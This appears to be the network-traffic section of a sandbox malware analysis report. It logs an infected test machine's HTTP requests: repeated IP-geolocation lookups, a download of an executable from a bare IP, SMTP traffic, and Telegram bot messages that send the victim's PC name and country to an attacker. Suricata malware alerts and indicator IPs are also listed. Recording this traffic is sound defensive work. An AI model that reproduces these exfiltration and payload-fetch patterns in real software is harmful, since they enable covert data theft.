Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2014/01/2025%20/%2016:21:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20585948%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2014/01/2025%20/%2014:32:10%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20585948%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2014/01/2025%20/%2016:02:22%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20585948%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View	IP Address: 104.21.16.1 104.21.16.1
Source: Joe Sandbox View	IP Address: 104.21.16.1 104.21.16.1

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 166.62.27.188:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:52777 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:52742 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:52763 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:52753 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49754 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:52760 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:52768 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:52750 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:52769 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:52758 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:52748 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:52764 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:52752 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49758 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:52759 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:52775 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:52779 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:52746 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:52785 -> 104.21.16.1:443

Source: global traffic

TCP traffic: 192.168.2.4:52774 -> 46.151.208.21:587

Source: global traffic	HTTP traffic detected: GET /admin/245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /albt.exe HTTP/1.1Connection: Keep-AliveAccept: /Accept-Language: en-chUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 147.124.216.113
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49757 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:52744 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:52756 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:52771 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 192.168.2.4:52790 -> 104.21.16.1:443 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113

Source: global traffic	HTTP traffic detected: GET /admin/245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2014/01/2025%20/%2016:21:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20585948%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2014/01/2025%20/%2014:32:10%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20585948%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2014/01/2025%20/%2016:02:22%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20585948%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /albt.exe HTTP/1.1Connection: Keep-AliveAccept: /Accept-Language: en-chUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 147.124.216.113
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

